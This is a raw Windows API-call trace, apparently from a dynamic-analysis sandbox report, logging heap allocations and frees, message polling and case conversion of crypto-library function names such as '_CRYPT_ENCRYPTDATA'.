[0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.258] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17198) returned 0xac2018 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0040.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0040.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17198) returned 0x94c1a8 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.261] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.261] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.262] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.262] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.263] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0040.264] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.264] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 